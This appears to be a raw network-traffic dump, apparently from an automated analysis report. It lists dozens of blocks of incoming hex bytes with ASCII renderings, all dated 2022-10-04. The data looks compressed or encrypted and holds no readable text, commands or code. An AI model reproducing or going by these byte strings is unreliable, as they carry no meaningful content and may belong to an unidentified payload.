                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1207INData Raw: 82 84 88 4c 6d f8 89 c4 ea 57 a6 27 ae 0b 29 24 59 47 a4 71 79 d6 8f bd a2 4f c9 4a 3b ca 0f 94 74 13 71 12 6b f3 a1 8d 49 60 b3 1f 4b 39 52 d4 a1 45 3b 5f 65 63 6d 9f d3 45 7b ef c2 95 74 1f f6 a9 2b fd d9 34 c5 d8 c0 56 b0 7a 53 4a f3 f4 0a b4 d7 1b 2d 9e f0 5d d1 0a 2c 19 75 ab 3e 69 6d 07 b8 67 78 23 5e 92 11 9c 33 7f 58 35 ea 3e 32 87 18 38 8b 1c d8 7f 44 9c 92 78 65 9d b9 5b 6d b0 06 5c 2c 62 15 81 51 0f a3 5c 21 a7 24 67 d4 ec f9 44 0a 4d 58 67 59 1a 06 ca 5b 88 85 3e b8 4c 3a 61 31 c6 a3 db 01 0e 8e 0e 20 ab 05 fe f0 09 4b 3a 83 49 da 98 64 73 34 11 ba c4 c7 0d 49 c7 72 df 9f e8 26 78 13 41 64 48 39 d2 c7 2d fc e0 44 b8 69 36 b1 9a a5 40 a3 64 f8 8e ff ae 6b a1 5a 2d 44 9e 20 49 ac c0 6c 32 b3 c1 ca 74 26 92 cc 13 20 69 b6 f4 84 f8 a3 66 83 3c 1d
                                                                                                                                                                                                                                    Data Ascii: LmW')$YGqyOJ;tqkI`K9RE;_ecmE{t+4VzSJ-],u>imgx#^3X5>28Dxe[m\,bQ\!$gDMXgY[>L:a1 K:Ids4Ir&xAdH9-Di6@dkZ-D Il2t& if<
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1223INData Raw: a9 d7 6b d9 6e 87 02 69 75 8a 45 45 89 ef 33 b5 12 93 1e 73 b7 bc 5d b2 72 ee 2a bb 88 76 ec 09 a8 70 ce cc 09 2e c5 2c 31 59 12 c5 fc d3 c0 89 64 a1 45 01 d1 99 c2 3f f9 aa d7 61 f7 4b ff 3b c1 58 41 7e 36 9a bc 5d bd 84 de 84 8b 3e 8a c4 27 05 6d 4b 59 21 b1 18 87 57 38 15 3c 5a 89 7f d5 b9 92 72 ad 26 22 59 4c ec 2b 74 a2 05 a2 ba 89 99 5b 01 de a8 51 0c 56 7e 2c 8c 92 36 04 6a 85 0a 61 52 44 f0 fb de d5 f6 60 a2 47 f2 17 8b 96 b8 77 83 fc dd e7 fe 64 72 ed b3 c0 2c 12 7d fc 25 a1 59 77 c5 32 aa 57 d9 16 3e b3 1f a5 b1 03 81 0b 91 a5 7b 87 d5 96 e9 74 f1 01 c2 34 ad be cf e7 b1 fc ce 3b 11 64 f0 75 29 50 96 17 89 87 ac ac b5 97 53 c4 9c c9 5c 37 0a 49 8a f0 c7 fe 89 3f fa bb cf dc 34 3e e8 02 3a 92 95 c4 38 a4 a0 7f 18 e1 fb 86 e8 b3 98 2f 9d b7 bf ea
                                                                                                                                                                                                                                    Data Ascii: kniuEE3s]r*vp.,1YdE?aK;XA~6]>'mKY!W8<Zr&"YL+t[QV~,6jaRD`Gwdr,}%Yw2W>{t4;du)PS\7I?4>:8/
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1239INData Raw: 38 07 e0 d3 2e 0b 3d d1 ff 7a 88 c9 16 90 db 9c 90 52 3a 4c 74 5d fa 48 f8 0c 2d 88 1f a1 87 00 9c fa d8 3a d1 02 73 f2 ca 62 84 76 7a 34 77 22 c9 8b 37 fa f1 92 eb 80 4b fd 7b fc bf b9 31 a9 a4 20 2d fe c7 ed be 63 1d 72 2d b3 57 81 c2 82 d3 e1 61 8b 41 a1 c4 18 2a 25 e6 c7 58 23 d3 e7 57 af 03 1b 97 8d a3 9b 98 10 9e bc 9c db b5 10 54 ed 51 99 d6 df db 78 e9 39 af 5c 63 d1 bf 6e 9f 9d cb 2a d7 ce 46 c4 a6 7c 4a c1 72 b3 27 90 18 81 0b 58 00 75 47 f0 28 d2 70 0f 96 64 55 d9 d5 6d 44 47 b0 c6 82 f7 aa 9c b0 4a 85 8a 33 dc 59 55 1f c6 46 bc db 2a 7c 28 b4 40 06 47 b4 a8 1a bc 26 31 14 09 e0 70 77 48 20 88 e0 9f 54 d0 1e 27 ac af 64 d7 c5 5a da 5a d1 d0 71 c5 38 06 aa 5d b4 c8 3b 1a ae bc 93 43 01 e8 4a fe 66 b9 6e 82 aa 62 ca 10 32 c8 53 8a 85 6b c6 62 94
                                                                                                                                                                                                                                    Data Ascii: 8.=zR:Lt]H-:sbvz4w"7K{1 -cr-WaA*%X#WTQx9\cn*F|Jr'XuG(pdUmDGJ3YUF*|(@G&1pwH T'dZZq8];CJfnb2Skb
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1255INData Raw: 3a 71 f1 cb 73 50 22 26 c3 2f ff f9 e0 d8 fb f4 17 4c bc fb ef 7a 56 52 7f 80 e5 aa c5 b8 52 cb 5b cf a2 c1 64 70 d9 ee eb b1 d4 df ff 3f 72 e5 f0 7a de fb 9d fe 07 7d 68 93 bd b9 9f cb 2c 7d df 49 d6 4c 12 be fc 05 39 e5 01 69 bd 54 c0 f1 83 f4 0a a8 40 16 17 8f 48 2e 35 91 84 e9 31 d4 93 ee 00 d0 2b 88 ad 08 87 f7 83 15 6c 7f 42 de 10 78 b7 9e b1 ac 23 ec 93 26 a9 1c c3 2b 52 74 06 7e e0 fd d2 cc 3e 9b f8 96 cf 5d 64 39 05 08 18 1b ec 4d 91 e6 4b 46 e8 c5 2f 44 5e ef f5 d9 6d 03 59 a3 74 34 5d 21 67 33 17 7f 4c e7 09 05 53 ef f9 e9 0d 90 c7 49 0d 63 54 0a 4e 1a 20 90 50 ad c6 c8 a8 2a f2 97 fb ec 2c dd ce 31 e4 19 67 14 50 d6 4f 6d 41 bb ee ef 0c 19 7f 43 0b 6c 61 ad 61 e2 3c 84 40 9b 65 60 54 87 3e d0 d5 b8 c0 88 08 ce 50 c7 ea 72 b4 d9 12 5a 20 a6 f5
                                                                                                                                                                                                                                    Data Ascii: :qsP"&/LzVRR[dp?rz}h,}IL9iT@H.51+lBx#&+Rt~>]d9MKF/D^mYt4]!g3LSIcTN P*,1gPOmAClaa<@e`T>PrZ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1271INData Raw: 83 8c db 87 e9 4a f3 c9 3c ef e0 c0 04 f4 31 f2 c8 64 f7 61 c4 8a 79 e0 20 e6 e8 99 5f 0a f4 df 98 9a fd e6 4b f2 61 3d a1 91 04 ca 4d cd 12 c8 6a 75 25 b4 43 2e aa 92 8d 83 9e 05 51 2b 04 ff 5d 0c 83 0d 57 95 2b 8f 22 3d f2 fb f0 b0 d3 0c 6b fc 34 37 f1 d7 4b 27 bf 3f 9c f9 61 93 d0 e7 54 cf 81 16 0d b3 7a eb 1e 27 9b b7 de ac 02 b0 08 aa 25 0d 7a 8e ba 9f 4a 36 80 d2 42 a4 b4 5a 49 90 2b f6 d6 d3 84 07 cc f7 ef ef 13 64 86 46 db b6 b2 79 06 b5 bd 1b c9 d1 91 57 f9 e8 3d fc 4f 59 84 f6 63 0c a1 15 0e 08 02 da 68 b8 0a cd 37 12 46 a6 0b 61 ef 76 f6 ad 01 10 a6 d4 6f 15 02 32 d9 15 3b 26 8f ad f7 11 8e 53 c2 ea 7f dd 21 97 42 2d c7 ed e1 69 f0 fa 53 97 a0 2a cf ed eb ec 2b ed f6 d2 83 c1 2d b0 bf 5a d2 6e 7c 0f f2 56 8d d1 24 fd 72 b6 9d 99 c0 33 02 f4 50
                                                                                                                                                                                                                                    Data Ascii: J<1day _Ka=Mju%C.Q+]W+"=k47K'?aTz'%zJ6BZI+dFyW=OYch7Favo2;&S!B-iS*+-Zn|V$r3P
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1287INData Raw: 4b a5 9f dd 26 7e 15 a1 c2 1c 3d 68 f3 ab 4d 6f aa 7a cf 1c f2 a3 71 4f 46 6d b9 f4 68 dc f2 5e 67 af 4d da db 70 77 29 ca 2e b9 2f 4b b4 6a ef 87 17 e5 81 91 d2 df 9c 8a ae 57 b8 f7 75 34 f5 80 d5 35 da b8 8a 86 73 50 07 64 f2 8d 38 e6 7b 0f 33 98 c9 08 14 2c e4 38 bc 7d d2 9e 60 79 0e 53 ec 44 6c 09 4e df 97 e8 d1 13 63 4d 02 3a 35 22 7d 62 07 23 4c 11 1b 7e 08 32 ec 87 4c 2a 1e 8a c1 a4 45 64 0d 00 df a7 e3 c0 a7 4f 1f 01 b4 e8 30 c4 bc 6c 36 4e 44 02 19 20 c2 0e 89 a6 64 b5 87 07 26 5f 00 dd 4d e6 61 68 d5 6e 7a c4 f0 d6 53 44 a8 ad ca 65 7b 53 fa 79 1e 1a f8 40 39 a1 6a 7c 2a 0b 65 db f1 50 6e 0a 43 4f a8 ac 29 1e 0b 8c dc ee 96 11 53 b0 6a 9a 66 6a a4 7c e3 73 4f 51 08 52 ad bc 53 6a f2 87 2b 55 9d b6 2b e7 08 08 ed 5a 0e c7 44 64 94 a4 bc 71 e5 56
                                                                                                                                                                                                                                    Data Ascii: K&~=hMozqOFmh^gMpw)./KjWu45sPd8{3,8}`ySDlNcM:5"}b#L~2L*EdO0l6ND d&_MahnzSDe{Sy@9j|*ePnCO)Sjfj|sOQRSj+U+ZDdqV
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1303INData Raw: ce 4d cd 78 7d 1a 25 b2 6d 9e d3 27 27 10 46 c3 fc 07 71 12 cc 84 d3 22 d0 e0 06 e1 6a 68 be 5c d3 f0 bc 33 8d d9 92 d2 bd e2 e8 19 54 46 98 30 60 cf 9f 9e 7e 56 5c 32 03 4b a9 57 1c 8d 3b 0e 31 9f 8e e1 14 03 aa 0f ec b9 c8 96 b7 dc 62 e3 18 a9 5b 22 a2 bf c8 ac a5 fd d1 09 89 07 cb 7e 6a 05 e7 2e c7 f7 aa 29 20 7a 8c c4 61 b6 1b 04 e3 c1 45 12 aa 21 8b d5 05 07 87 68 5e e5 27 36 db cb aa f6 37 b9 ba ce 28 89 be 93 08 a2 8a 51 97 a1 c7 94 0f 1a 1d 1f f5 09 73 d5 91 e4 9e 14 65 5e 94 02 80 16 d7 2c 42 67 f6 22 25 08 39 ec f0 d7 bf f2 83 9f f6 88 46 d5 05 c9 99 c4 f4 42 1a ba 08 a5 83 e7 69 b3 8e e7 17 05 64 30 2e 7b c0 3a 78 d8 9c 34 0d 50 57 21 42 88 d6 00 00 b4 34 27 38 af 69 bd dc 37 7b b3 49 4e 0e 92 61 52 80 07 bb 29 3b 62 96 18 30 8c ea 14 6d c9 2d
                                                                                                                                                                                                                                    Data Ascii: Mx}%m''Fq"jh\3TF0`~V\2KW;1b["~j.) zaE!h^'67(Qse^,Bg"%9FBid0.{:x4PW!B4'8i7{INaR);b0m-
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1319INData Raw: e6 8f f5 42 3d ab e8 1f ff cc da 5c e2 96 44 b0 28 43 fd 03 62 c8 8b 57 17 7c f1 e4 fe 37 ae 8e 86 59 54 a6 01 e0 8c 12 7f 54 42 17 76 cd 5a c1 38 35 17 c4 15 59 6e 31 34 56 76 e4 ee 0e ff 6e c4 62 0f 07 31 5b 57 c3 40 0a eb 07 ec f7 51 92 ca c5 58 4c 39 5c 57 db d8 ac 17 95 fd 51 1e 30 df 35 a5 77 71 af de 31 ed 7b 6c cd ca e8 a5 37 1a 58 0d da 5f be 5c d5 7a c8 f5 89 3a 3e 31 37 ff 48 ba ff 7f 7e fc 23 f9 71 3a c2 58 41 bd 23 09 30 41 5e 5d 91 51 45 7b fb aa 27 88 11 aa c7 c3 59 dd 51 b6 42 d0 e5 97 9d d8 02 e5 17 f4 ed cc ff 01 59 f6 f4 8d b8 5a 71 1e 68 82 a3 b0 a1 da 36 fe 69 be b8 4b 94 c8 18 d3 c2 42 57 47 9f f8 98 83 d7 e1 45 68 4f 37 fe ff 2c 99 e9 83 08 33 8c 7e a2 8d c9 0f 4c 4e d6 22 8a 4e d3 5a 4e 84 07 9e 9d 3f f6 3c 62 05 47 c8 4d f4 a6 05
                                                                                                                                                                                                                                    Data Ascii: B=\D(CbW|7YTTBvZ85Yn14Vvnb1[W@QXL9\WQ05wq1{l7X_\z:>17H~#q:XA#0A^]QE{'YQBYZqh6iKBWGEhO7,3~LN"NZN?<bGM
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1335INData Raw: ce e6 b8 3d 14 7e 2b 7d 0f 49 be a6 91 1a 8c ca 4f c9 ba 66 b4 63 3c 8f bd 71 de 2b 4c f6 6a ef 48 92 bc 29 2a 03 35 8d ef 44 90 3d ba a7 3f 96 25 d1 f4 c0 90 02 8c 93 da c4 90 d3 bf 84 a9 5d 5c 48 93 63 2e b8 b2 9e 3c 5a 30 b1 3a 30 4e 15 59 b1 de c9 c7 16 4b 4d af cb bf 6f d5 c6 ee b0 63 65 9e 29 b6 ce 37 6a f4 35 98 f8 a0 45 a8 06 f0 a1 3a 48 58 ca 48 fb 65 0c 3f db e4 86 44 75 cf d9 84 88 e9 a5 e4 66 74 80 6b 36 5f 57 7e 9e 98 04 6a 3b 91 d9 78 79 58 0d 70 81 0d 62 0b a1 25 09 89 0b 52 d3 66 56 9f ef 91 f1 5d 0c 8a fb 80 ec a6 23 88 bb 10 c4 36 d9 7a 29 b9 f1 55 7a 94 97 90 ee 13 44 c2 f8 51 d2 d6 5d df f5 78 6f 3a df 0f db e6 83 6a b6 04 05 96 bc 67 7f d8 31 fe e3 50 bf 42 99 9d f8 86 f0 5c 09 5b fa 83 e2 a9 32 48 c5 57 1c c7 8a 19 c9 9f 65 06 fc fd
                                                                                                                                                                                                                                    Data Ascii: =~+}IOfc<q+LjH)*5D=?%]\Hc.<Z0:0NYKMoce)7j5E:HXHe?Duftk6_W~j;xyXpb%RfV]#6z)UzDQ]xo:jg1PB\[2HWe
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1351INData Raw: 34 93 e7 61 d3 8c 7d 37 c6 cb b3 12 dc 58 59 34 b2 aa 4c e0 f4 64 c0 8a 39 aa 7d 0d a5 91 f1 3f 1e 82 63 12 24 e6 23 a6 27 3f cb a3 7c de eb 6f 00 7a ea 38 90 16 16 3f 70 78 0f f9 f3 a4 33 f5 4d f5 61 d9 f5 94 45 0e 01 a4 cb 9f 08 3e 78 cc 0d d5 38 5b fa f0 b5 4c 99 5a cf eb 1b 30 4c a1 fa 51 40 75 df 75 10 53 5e 09 c7 30 ec 1c f2 53 c1 b3 65 81 1f 11 06 bd c6 6f c8 86 b7 2a 75 01 e0 67 d9 a4 09 a9 5c 9e 3f ee 2a ea 5e df 17 16 58 a9 a9 d0 2c b0 29 66 e9 9e 24 29 12 44 1c fb e2 0c 4f 48 1b ce 9d 17 8d b8 e4 8c 72 d5 d3 d5 d9 1f dd 0b 67 d2 c2 5a 1d b7 30 ff f5 fc 92 61 42 04 1e 4f db 57 13 de 8c a0 2e fe 75 04 c5 c8 20 96 dc 86 ec e3 26 34 17 f8 8c 7b c2 33 68 77 17 82 b3 cb 91 15 c2 ad 0b aa bf 76 8b c1 c7 a9 60 74 df 96 4c 24 e9 f2 a0 cc 6b 46 af ec 1e
                                                                                                                                                                                                                                    Data Ascii: 4a}7XY4Ld9}?c$#'?|oz8?px3MaE>x8[LZ0LQ@uuS^0Seo*ug\?*^X,)f$)DOHrgZ0aBOW.u &4{3hwv`tL$kF
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1367INData Raw: cc c1 57 dc 28 ea 49 4d 75 c5 66 67 87 e5 66 e7 29 8d 5c 9e a7 15 06 ef 07 1a cb 9c c6 1d 93 fd e9 08 b7 ca 22 12 78 ff 34 e6 d5 dc 97 65 1f 69 de a7 b4 31 f3 23 88 c9 80 43 7c 2c 57 6c e8 f7 fd 66 6d 3a 95 3d 9b 51 88 c0 ed ba 4b 2d 90 2d d7 2f 76 44 fa cd 47 36 ed cc 4d 1e 79 3e eb ef 48 0c 2a 05 2e 62 64 a5 28 2b bd 8a 9b da b2 85 1d e8 7f 5f d7 bb 62 0f 2f 10 b8 81 72 f9 fa 0a 8d 71 58 b6 b2 d2 c9 bd 16 74 e1 1c 68 ed 61 0a ef 63 8f 62 c7 6d b7 f2 ec 0c 7f ba 8b cd d6 64 c7 cf 94 60 04 6c 56 94 97 a7 f9 45 2c fe a6 c5 0c 1f 0d 9d 9d b0 31 aa ca e7 36 5f 1e 3a 08 c2 90 a9 1b 43 01 e0 1a b8 50 fe 8d ec 86 1c 36 58 c9 32 54 34 e3 64 c9 7d 5a 2e 7d 07 e6 ed b4 9b 16 5f 29 0e 17 f2 7d e0 54 cf d1 2b 06 21 02 bd 8c 19 be 3e 8a 4b ef 9d 57 a9 73 1c bc 8c f6
                                                                                                                                                                                                                                    Data Ascii: W(IMufgf)\"x4ei1#C|,Wlfm:=QK--/vDG6My>H*.bd(+_b/rqXthacbmd`lVE,16_:CP6X2T4d}Z.}_)}T+!>KWs
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1383INData Raw: 7e cb fe 8b 67 50 b3 db 98 a9 3b 69 ff 21 87 d9 94 e7 4e cf 18 fd f3 75 87 4e de d0 42 b7 80 60 ac 4a d2 43 4c a6 e1 81 ca b2 71 5d 16 a1 84 c6 23 2f 30 4e d0 c4 14 62 2f 2b 03 70 59 d5 2b 95 6b bc a0 7e 2b b8 5e 52 27 54 78 cf 82 66 c6 c6 b7 c1 b3 4e 07 f2 10 58 df 21 59 24 c7 44 0d ff d3 31 d7 fd f9 0a bd 3c 7d a0 b6 77 24 fb 24 d5 5e e8 0a 9c 77 17 fb 5f 3e d1 a3 36 bd d3 a1 c3 b3 ff 9c cd c1 75 80 ed e5 f6 27 19 25 c5 81 b3 21 24 09 ee e8 2d f6 7e a5 2f 4c 75 00 a1 de 39 61 58 fb 6c c2 81 34 fe 45 f8 bb 5e 02 47 53 e5 ab c9 13 e8 a5 19 bd 52 cc 3f 8e d8 e9 7b 56 40 0f 00 a6 f5 4a 3c 86 69 e9 37 14 f0 18 45 ab 0d 54 84 60 52 02 02 6b f6 d5 67 61 48 7a c0 c5 82 fd 1f b3 dc e5 7d 5b 68 86 cc 2f 9a d1 23 80 05 48 a2 02 e1 a4 ef 4e 02 13 2d 89 c3 79 2c 78
                                                                                                                                                                                                                                    Data Ascii: ~gP;i!NuNB`JCLq]#/0Nb/+pY+k~+^R'TxfNX!Y$D1<}w$$^w_>6u'%!$-~/Lu9aXl4E^GSR?{V@J<i7ET`RkgaHz}[h/#HN-y,x
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1399INData Raw: cf 6a 04 ef 3a c6 0f 65 05 21 b6 79 e3 b1 1b 89 48 99 2b 37 6c a8 71 8b 1d d0 f2 8a 8c 0a 88 85 e0 36 ad 66 6a 84 55 19 5c 91 d7 c1 33 43 da 32 f4 f5 7c 60 33 66 09 d9 77 03 72 8d db 2c 95 16 73 9b 64 fc 52 83 6a bb cc b4 f1 f3 54 de f6 f9 f4 fd 74 66 8e fc 11 23 12 7c 1b f2 65 0f 9d 71 11 a7 c4 e4 b8 91 8f 89 17 3e 8b 5c 3b 59 53 7e 89 aa bb b7 7f 64 95 a6 4d 10 1f ee 5d 04 29 3e 54 0f ac 45 eb 54 d7 44 b9 d3 a6 0c de 55 88 c4 4a 19 d6 cd 76 12 87 4a dc 7a 37 c4 de f3 bd c5 33 0c 0f ed 37 51 d1 1e 0e 8d 09 df d3 4c 99 08 4b 47 5d 3e 82 d8 e8 aa 9a 3b fa 42 1a 69 dc 29 24 e4 00 64 e3 80 87 86 05 23 22 b6 63 99 47 b2 0b f1 81 2d 66 4f bb 1f 02 bf 3b 50 a4 6a 36 b2 bd 4c 2b e3 9a 35 cd fd 93 7e 3a 08 ab d6 2b a5 f5 28 16 51 de ba 24 f3 0c 4e e4 fb 39 52 e0
                                                                                                                                                                                                                                    Data Ascii: j:e!yH+7lq6fjU\3C2|`3fwr,sdRjTtf#|eq>\;YS~dM])>TETDUJvJz737QLKG]>;Bi)$d#"cG-fO;Pj6L+5~:+(Q$N9R
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1415INData Raw: 42 0f 80 16 7f 8b 0e a5 13 1a 79 fd d0 a6 37 f0 89 c0 6b 59 08 64 dc 11 33 d3 e8 dd 79 72 78 28 11 00 64 73 f5 09 10 8e da a6 ea 13 c1 12 0c 6d d5 b5 74 2e 3d 58 c8 74 e4 61 41 ac 53 59 17 61 45 91 27 93 d0 c2 ec d7 91 b7 29 2d fe d4 cd 56 9a ee 97 8c d3 04 39 de 37 55 0b f3 06 c5 36 80 0b 6e 18 4c ae 0c e1 3d f9 05 05 0b 67 45 92 c8 a6 1f 99 f8 fe a5 a8 9f 45 97 1c ab 60 76 e6 3f c0 56 fe 38 cc 40 13 37 49 24 6f 10 ba 49 dd 64 5d 4e e2 ad 48 d2 d5 7c 56 25 b9 2a 82 66 25 fa ee 3d df d8 70 8a 8b f7 10 a9 27 ea 0b 6b f7 44 6a b0 80 9c c4 a0 5a 31 b0 cb 8d 30 31 22 ea 14 96 9b 12 0f b9 08 be 59 c2 81 65 ed 13 48 b7 91 e2 1a 6f f4 10 30 48 11 b8 2f 37 76 ff 08 10 23 52 e6 23 e3 5f 08 82 ca 64 6b 7d d8 13 50 20 df 22 c7 42 0e ab 47 e1 40 fb 8a c2 e6 cb ac 7d
                                                                                                                                                                                                                                    Data Ascii: By7kYd3yrx(dsmt.=XtaASYaE')-V97U6nL=gEE`v?V8@7I$oId]NH|V%*f%=p'kDjZ101"YeHo0H/7v#R#_dk}P "BG@}
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1431INData Raw: 23 e4 79 74 b6 b2 c1 29 06 09 2a e2 4f 41 0d 30 31 31 3c ad f3 27 3c 24 73 41 74 43 3c a3 cb 1c af c2 91 a5 3e ef 83 02 a2 e4 59 85 0d 9d d3 b7 50 8a 09 c4 96 be ed 17 14 f3 c4 84 42 eb 4a ca 53 cf 5b 89 2e ab 67 7e 9a 4c ad ae b4 b7 0b db 16 0c 7f 49 2e b1 39 35 6a 24 61 4e c3 eb 21 90 57 85 36 02 5a 4d 38 f2 ac 86 a9 c0 98 39 65 7a 1a fe 2d 8e 60 fe df 78 65 55 ed bc 61 57 1b 04 7b 5b b9 24 a9 7a 8b d1 88 c5 a5 8d 72 b2 89 ac ce f9 bd 22 01 45 fd 4a 56 93 0c 4a ae fd a4 a1 77 bd 85 08 21 c8 7c f6 98 b5 fe 68 ea e1 b9 5e 52 e2 31 25 91 8e 59 5a a3 47 e3 a2 1d 88 52 52 b6 67 fc 00 1f 89 58 9f 0d b0 f8 0a b0 2e 80 fb d8 6e 78 f6 cf 82 92 cb 71 6f a8 34 98 d0 2b c9 8b a4 1d 24 1b 03 99 2f 88 45 53 8c 31 eb 08 45 d0 2c f4 59 35 4c 8f a4 f9 60 f0 66 2c 2d fb
                                                                                                                                                                                                                                    Data Ascii: #yt)*OA011<'<$sAtC<>YPBJS[.g~LI.95j$aN!W6ZM89ez-`xeUaW{[$zr"EJVJw!|h^R1%YZGRRgX.nxqo4+$/ES1E,Y5L`f,-
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1447INData Raw: 11 37 08 f1 3b b0 8d 60 46 f1 e2 fa 19 90 a5 81 6f 51 a5 3e 52 c8 eb 96 3f 5e 96 f1 bd 77 73 f4 dd 54 f2 07 6e 6d b3 ee a1 a0 7d 3a 83 37 a5 5c 2d 20 cd e1 95 eb 73 b1 2b de 2d 56 20 b8 ce fc 0f 57 1d a5 25 b5 82 9e 10 77 16 80 c5 9f 37 1a a9 df 70 29 36 75 1d 4d 82 bc d6 03 97 65 43 ad e1 75 69 b6 a3 e1 f8 98 68 dd 76 5c 2b 79 d2 ea dd 51 1d d9 4e ed ed 11 5b fe a7 8c d7 e6 19 61 9a a9 c8 ea 7b 0f dd 24 86 ea 54 a7 ae 50 2b 6c 7b 48 00 80 f3 7d 36 f3 8e 40 2b b4 ce 03 f1 83 9e 21 88 7f 33 ee b0 e3 90 8b b6 27 48 c1 58 db 1c 2e 76 83 83 79 c9 91 d2 a2 d7 b5 bf f9 b0 8b ca 6e 9e 71 4b 84 ab bb 80 3a 0c 59 b1 5b 3d 0a ba f4 bc 74 e8 58 25 43 9f 19 91 9a 9d 6d 2e 97 04 96 ae eb 7e b4 58 d1 8d c5 2c 80 5b 41 b5 ef e1 96 21 4a 08 49 99 cd 09 8f ba b3 0c b3 40
                                                                                                                                                                                                                                    Data Ascii: 7;`FoQ>R?^wsTnm}:7\- s+-V W%w7p)6uMeCuihv\+yQN[a{$TP+l{H}6@+!3'HX.vynqK:Y[=tX%Cm.~X,[A!JI@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1463INData Raw: 54 0c d7 30 09 5c 04 75 65 28 9b 66 99 1b 49 6b 42 70 e5 ec 0b 58 26 1f a0 55 88 b4 da 56 47 5a a0 83 0e fc 47 7b 52 10 2d f5 64 c5 3a f2 b3 ca d2 b5 d5 72 cd c6 d2 79 4a 2c 11 4c a4 b7 17 9e dd 5e 84 bc 5a 6e 06 de 4e ac 81 29 9f f5 8c b0 f4 72 66 77 33 c8 58 07 71 1f 0c aa a4 7a 01 04 80 6a fc d6 b0 36 57 84 3e 27 9f 90 f5 d5 a3 df ca 1c d6 90 4e 76 76 04 b5 78 60 fc ae c2 b3 dd 3a 0a 45 f8 89 e0 23 d9 90 99 d3 75 35 ea b0 1e 90 64 44 39 bf e0 c7 80 22 ff b4 04 91 de 4f 1f 5f 63 02 81 a2 e5 86 1f 38 8c da 0e c6 19 a8 02 f8 1f 9a 24 8d 5d b0 59 90 fb 1d cc e3 01 e4 26 18 a6 c4 a0 80 b6 11 81 fd 78 a0 fe 21 eb ce 17 ff 6a f5 4d 04 fe 63 4f 49 81 68 54 5b 34 c6 64 f3 3f da e3 5e 42 2a 3c e3 1a 39 68 97 b1 eb ae d6 4d cc b7 2e 06 cc 49 67 63 28 8a c3 46 f9
                                                                                                                                                                                                                                    Data Ascii: T0\ue(fIkBpX&UVGZG{R-d:ryJ,L^ZnN)rfw3Xqzj6W>'Nvvx`:E#u5dD9"O_c8$]Y&x!jMcOIhT[4d?^B*<9hM.Igc(F
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1479INData Raw: ee 08 b0 a8 73 74 47 b5 3a 39 92 f1 2e a4 d6 b7 93 52 bc 6c a8 95 ec 12 e7 bc 14 a5 23 a3 e1 02 98 ce 39 a6 e7 d8 2c 9f ee 91 f5 34 40 48 60 3e 2a 19 1d e4 bd b4 ad 10 b0 b4 9a 98 aa b3 5b 18 46 28 a4 a7 36 de 39 d1 be f1 f6 09 fd 75 d8 8e c1 04 ba 16 97 a7 a4 21 b3 0c 54 e2 68 8a 7c ac dd 62 8e c9 36 77 85 4d f4 84 f6 ca a0 e6 c4 7a 5f 9e c7 c2 41 56 73 fd 0d ff 2b c1 a7 be a6 99 9d 6a 79 5e 54 90 c9 9d 5a c1 b3 f5 2c f7 a6 aa ef 81 06 fa c7 f3 f4 3a e2 44 fd 3a 00 c9 3b cb 79 49 e1 40 ec 88 b2 31 bb c0 32 2d ed 63 4c 8f 2b c0 51 43 10 d4 6a 87 05 b3 c5 0d da d3 39 93 fa e9 79 5c 2b 68 75 24 78 e3 63 21 21 12 c9 d4 27 06 8d 24 f2 4b d1 66 aa 60 af a2 b1 4a 29 25 48 9a 9a dc a4 63 73 77 0d 62 54 99 2c f1 bc bb 82 6c 78 7a f6 c4 2b ce 58 55 e1 27 12 ad a2
                                                                                                                                                                                                                                    Data Ascii: stG:9.Rl#9,4@H`>*[F(69u!Th|b6wMz_AVs+jy^TZ,:D:;yI@12-cL+QCj9y\+hu$xc!!'$Kf`J)%HcswbT,lxz+XU'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1495INData Raw: 6d e8 c2 4a 57 bc 7f f1 22 28 fa 57 68 fd 1f ab 59 22 05 05 f0 1e 2e 03 df 6a d0 91 96 b2 90 ba 11 ac 7a 8c a4 fb 81 93 96 15 68 23 33 47 81 50 6c 29 ea 8f 84 a4 0c 45 a7 ee 74 c3 ca 47 cb 86 ab 41 26 b2 61 6f 9e 09 d6 66 be 4d c4 b9 fd e0 f9 e9 b0 62 7b 7f 22 29 5b 5d 7d 28 d7 26 17 d9 be 91 42 22 70 90 02 b7 e5 22 68 4f 29 7c 49 db 98 fc 56 9d b3 fd 95 3d a9 e4 69 61 ec 3b db f6 eb 86 59 85 e5 5d 6a 00 48 ec 5c a8 1c a9 ca cd e4 ff 0e b7 e8 b0 61 85 9c 59 ea 9d a1 c2 6e c3 53 67 6b cf e1 dd af 36 b2 94 00 d9 f8 16 7b b6 ae f5 b2 08 e6 56 7d 91 50 72 9f 30 5a ca 4c b3 fb 9a 5f fe 78 c4 3b 1a 54 e2 fd d3 0f f7 8b a1 47 c6 1d f6 77 a7 f7 fe bd 71 c6 53 6e ca 50 44 ad af f7 6e f1 b8 fe f5 56 2e 5c 43 47 ad 1c 6b e4 f6 8d e4 56 32 55 fd c6 78 7d 67 d4 ea 46
                                                                                                                                                                                                                                    Data Ascii: mJW"(WhY".jzh#3GPl)EtGA&aofMb{")[]}(&B"p"hO)|IV=ia;Y]jH\aYnSgk6{V}Pr0ZL_x;TGwqSnPDnV.\CGkV2Ux}gF
